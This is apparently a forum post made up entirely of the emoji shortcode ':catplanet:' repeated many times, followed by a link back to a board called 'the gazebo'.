:catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet:

Return to “the gazebo”